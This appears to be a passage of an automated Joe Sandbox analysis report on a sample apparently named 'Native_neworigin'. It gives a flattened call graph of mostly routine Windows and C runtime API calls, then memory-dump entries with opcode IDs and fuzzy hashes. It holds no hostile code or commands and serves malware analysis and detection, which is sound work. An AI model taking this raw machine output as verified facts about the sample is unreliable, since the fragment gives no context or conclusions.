calls __getptd_noexit 41984->42053 41987 401ebf 41999 40af66 41987->41999 41990 40b870 41990->41993 42045 40ec4d 62 API calls 2 library calls 41990->42045 42046 40eaa2 62 API calls 7 library calls 41990->42046 42047 40e7ee GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 41990->42047 41991 40b8bc RtlAllocateHeap 41991->41993 41993->41987 41993->41990 41993->41991 41994 40b8ec 41993->41994 41997 40b8f1 41993->41997 42048 40b7fe 62 API calls 4 library calls 41993->42048 42049 40d2e3 6 API calls __decode_pointer 41993->42049 42050 40bfc1 62 API calls __getptd_noexit 41994->42050 42051 40bfc1 62 API calls __getptd_noexit 41997->42051 42001 40af70 41999->42001 42000 40b84d _malloc 62 API calls 42000->42001 42001->42000 42002 40af8a 42001->42002 42005 40af8c std::bad_alloc::bad_alloc 42001->42005 42054 40d2e3 6 API calls __decode_pointer 42001->42054 42002->41914 42009 40afb2 42005->42009 42055 40d2bd 73 API calls __cinit 42005->42055 42006 40afbc 42057 40cd39 RaiseException 42006->42057 42056 40af49 62 API calls std::exception::exception 42009->42056 42010 40afca 42012 401903 lstrlenA 42011->42012 42013 4018fc 42011->42013 42058 4017e0 72 API calls 3 library calls 42012->42058 42013->41937 42015 40191f MultiByteToWideChar 42016 401940 GetLastError 42015->42016 42017 401996 42015->42017 42018 40194b MultiByteToWideChar 42016->42018 42019 40198d 42016->42019 42017->41937 42059 4017e0 72 API calls 3 library calls 42018->42059 42019->42017 42060 401030 GetLastError 42019->42060 42021 401970 MultiByteToWideChar 42021->42019 42024 40af66 74 API calls 42023->42024 42025 40187c 42024->42025 42026 401885 SysAllocString 42025->42026 42027 4018a4 42025->42027 42026->42027 42027->41939 42029 40231a SafeArrayUnaccessData 42028->42029 42029->41946 42031 4019aa InterlockedDecrement 42030->42031 42032 4019df VariantClear 42030->42032 42031->42032 42033 4019b8 42031->42033 42032->41953 42033->42032 42034 4019c2 SysFreeString 42033->42034 42035 4019c9 42033->42035 
42034->42035 42061 40aec0 63 API calls 2 library calls 42035->42061 42037->41917 42038->41921 42039->41933 42040->41970 42042->41974 42043->41976 42044->41977 42045->41990 42046->41990 42048->41993 42049->41993 42050->41997 42051->41987 42052->41984 42053->41987 42054->42001 42055->42009 42056->42006 42057->42010 42058->42015 42059->42021 42061->42032 41796 6c7b23 41797 6c7b2b 41796->41797 41799 6c5f10 41796->41799 41798 6c6084 SetFilePointerEx 41798->41799 41799->41798 41800 6c5d90 41799->41800
Memory Dump Source
• Source File: 0000000D.00000002.1783619720.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_6430000_Native_neworigin.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a7e6ed6b4786d7b44f4ab75095f805b8ad6778daebed3c6ee1d71b6bb8a6404a
• Instruction ID: 396b34427ee56aa5f3ae0717c993c4ef8a757b8794fe47a53cd0770da622cbfb
• Opcode Fuzzy Hash: a7e6ed6b4786d7b44f4ab75095f805b8ad6778daebed3c6ee1d71b6bb8a6404a
• Instruction Fuzzy Hash: 0263FA31D10B198ADB51EF68C8846A9F7B1FF99300F15D79AE45877221EB70AAC4CF81
Memory Dump Source
• Source File: 0000000D.00000002.1783619720.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_6430000_Native_neworigin.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9a3670aec31aeafcf2a67df41a2ff45c89dc86224f3e5adc77c00e87e881bc7f
• Instruction ID: 683c5f65574d333523e7fd8f2e79c79a256d9d1af39d3f97e2f64fe32d163767
• Opcode Fuzzy Hash: 9a3670aec31aeafcf2a67df41a2ff45c89dc86224f3e5adc77c00e87e881bc7f
• Instruction Fuzzy Hash: 21B16E70E00259CFDF54CFA9C8817AEBBF2BF88314F14852AD415AB394EB749845CB81
Memory Dump Source
• Source File: 0000000D.00000002.1783619720.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_6430000_Native_neworigin.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 38763df0ad68e08f8cfa7d4278859de204842cf00948be19706d964a4f17a1a4
• Instruction ID: 5e27fa56e5df73a8d689ec9ee0527c6b2ccccdde7c966c276826cb85a269a105
• Opcode Fuzzy Hash: 38763df0ad68e08f8cfa7d4278859de204842cf00948be19706d964a4f17a1a4
• Instruction Fuzzy Hash: B0028E34B116109BCBAA7B78A46823D36E3EBCE761B25156ED503CB380CE39DC479B41
Memory Dump Source
• Source File: 0000000D.00000002.1783619720.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_6430000_Native_neworigin.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a9f6b0ada4b9df8c80079894d9f788e5114264c4ce006c9b1de35d56d053c38a
• Instruction ID: 5c7057c353aaae81e0d40734fb819cbde4c22d3e68f78ec1512de79b8d7f1b9f
• Opcode Fuzzy Hash: a9f6b0ada4b9df8c80079894d9f788e5114264c4ce006c9b1de35d56d053c38a
• Instruction Fuzzy Hash: 17A17C70E00269CFDF54CFA8D9817AEBBF1BF48314F14852AD815AB394EB749885CB81
Memory Dump Source
• Source File: 0000000D.00000002.1783619720.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_6430000_Native_neworigin.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 86e280bb8b58cc72f804eafc56f1cedd58f17722355fee10043192e741d1359a
• Instruction ID: 54ac866726296a9d1c59a0e20b1359439cf3e8d988fe61790db41a681115aeeb
• Opcode Fuzzy Hash: 86e280bb8b58cc72f804eafc56f1cedd58f17722355fee10043192e741d1359a
• Instruction Fuzzy Hash: DF819D71A402148FDB44DF69D884B9EBBF6FF88310F14C16AE909AB395DB70D845CB90
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.1783619720.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_6430000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 5beb479d3ffe6987b638829e0f62d109823fddb65736a0a73ef13646be304286
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: cac288bf0a897f722efaf261c922a463cf360532b588a5cc3bb3168d985c83e8
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5beb479d3ffe6987b638829e0f62d109823fddb65736a0a73ef13646be304286
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D715A70E002599FDF50DFA9C985B9EBBF2BF48314F18812AE815A7354DB749842CF91
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.1783619720.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_6430000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 626dc4363cc1e4d92e9758b7a6827e3eb251b65386264678e67000b03b532e12
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: d0d58ff97835f4687415d2c717455bdc87efc4640a6750e02aa92019fe7cce82
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 626dc4363cc1e4d92e9758b7a6827e3eb251b65386264678e67000b03b532e12
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EA715A70E002599FDF50DFA9C984BEEBBF2BF88314F18812AD415A7354EB749842CB91
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.1783619720.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_6430000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 42a53405ce1a2770a7f46ec01f34540fa4299e48640ffeaef79400498f8daa03
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: b5c148ffb8aa4f552a4857dbfcd9cabc67660921915c7d42f17896eaa0a00060
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 42a53405ce1a2770a7f46ec01f34540fa4299e48640ffeaef79400498f8daa03
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 91319C357401254FDB0AAB3AD564A2E7AB7EFC8650710816AE506CB3A8EF24DC068FC1
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.1783619720.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_6430000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 726f4e3c164c6b05077fe65cfbad1edc48db3a943247ebf7f68c538ca1f3345d
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: af226cd1c3ed7bc1eeb8d605ed8ec7c41b8dae75dc875ee09734637835dc41b7
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 726f4e3c164c6b05077fe65cfbad1edc48db3a943247ebf7f68c538ca1f3345d
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0711CE31A002048FDB15EFA5D944B8BBB66AF88710F14C564C8481B386EBB4E886CBE1